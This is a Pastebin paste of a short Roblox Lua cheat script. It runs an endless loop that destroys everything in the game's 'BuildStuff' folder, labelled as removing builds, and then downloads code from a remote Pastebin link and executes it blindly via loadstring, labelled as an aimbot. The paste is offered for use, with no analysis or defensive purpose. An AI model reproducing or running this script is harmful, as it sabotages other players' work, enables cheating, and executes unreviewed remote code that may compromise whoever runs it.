Advertisement
Guest User

Untitled

a guest
Sep 16th, 2019
255
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.22 KB | None | 0 0
  1. while wait() do
  2. for a,z in pairs(game:GetService("Workspace")["BuildStuff"]:GetDescendants()) do
  3. z:Destroy()
  4. end
  5. end
  6. -- REMOVE BUILDS!
  7.  
  8.  
  9. -- AIMBOT
  10.  
  11. loadstring(game:HttpGet("https://pastebin.com/raw/61vdJN2e", true))()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement